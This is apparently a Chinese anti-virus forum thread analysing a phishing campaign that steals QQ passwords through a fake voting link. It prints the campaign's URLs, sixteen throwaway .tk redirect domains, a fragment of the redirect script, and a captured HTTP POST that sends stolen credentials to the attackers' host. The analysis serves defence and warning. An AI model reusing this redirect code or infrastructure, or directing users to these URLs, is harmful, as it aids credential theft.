盗QQ网站的分析

凝逸反毒

盗QQ网站的分析

*****QQ前天被朋友发来的投票信息所感染盗号病毒，造成本人QQ密码外泄，自动群发盗号投票网址，造成本人大量好友感染木马，密码外泄

，为避免造成更大损失，希望大家帮忙，那个网址是：http://zsxy.cqnu.edu.cn/upfiles/2014-2/201422220376602.html?

8270=Mjc2MyYxMDk4

我几十个朋友中招了、



http://zsxy.cqnu.edu.cn/upfiles/ ... l?8270=Mjc2MyYxMDk4  [主站被挂马或?]

http://hdi.yzphy.com/64.js    [列表在这]
http://jbuwoc.tk
http://fgas23ds.tk
http://asd2dasfsa.tk
http://vniu2d.tk
http://fsdfs4fg.tk
http://asbfdg43as.tk
http://jvbud82d.tk
http://jviw7l.tk
http://nbjs82.tk
http://nchw82.tk
http://fkj73lfk92.tk
http://jbu7os.tk
http://js9wdk.tk
http://bjo8diu.tk
http://bjka823ak.tk
http://jfdu28.tk











====http://hdi.yzphy.com/64.js=====
y5sbHN0eS5jb20vZi9nLmh0bWw/"
   var j="&h=1000&t="
   var g=".html?url="
   var h=".tk/"

   a==0?sChar=sChar1:sChar=sChar2
   b=iNum+sChar;

   c+=''+b
   
url = new Array(16);
url[0] = 'http://jbuwoc'
url[1] = 'http://fgas23ds'
url[2] = 'http://asd2dasfsa'
url[3] = 'http://vniu2d'
url[4] = 'http://fsdfs4fg'
url[5] = 'http://asbfdg43as'
url[6] = 'http://jvbud82d'
url[7] = 'http://jviw7l'
url[8] = 'http://nbjs82'
url[9] = 'http://nchw82'
url[10] = 'http://fkj73lfk92'
url[11] = 'http://jbu7os'
url[12] = 'http://js9wdk'
url[13] = 'http://bjo8diu'
url[14] = 'http://bjka823ak'
url[15] = 'http://jfdu28'
urlx = Math.floor(Math.random() * url.length);


  var loc = location.href;
  var n1 = loc.length;
  var n2 = loc.indexOf("?")+1;
  var n3 = loc.indexOf("&");
  var idc = loc.substr(n2,6);



}
function gourl(str,id){

        switch(str)
         {
                  case "0":
                          location.href=""+url[urlx] +h +f +g +e +id +j ;
                          break;                                                    
                  default:
                          location.href=""+url[urlx] +h +f +g +e +id +j ;
                          break;
          }
}
================


======qq密码发到这=======
POST /tool/c1/foom.asp?spmui=1098 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image peg, application/msword, application nd.ms-excel, application nd.ms-

powerpoint, */*
Referer: http://hkjdiw83.tk/tool/c1/b.asp?spmui=1098&name=sX5iI0fO6tL4
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: hkjdiw83.tk
Content-Length: 56
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCCCRTC=PCNPLIMADIGAMFPIBIANIIKI

address=XX&addressb=XX&u=88888888&p=66666666&btnSubmit=
==========

凝逸反毒

http://hkjdiw83.tk/tool/c1/foom. ... 6677&btnSubmit=

free4537

通过 Chrome 浏览了一下那地址应该不会中招吧?

275751198

不是吧，连大姐都中招了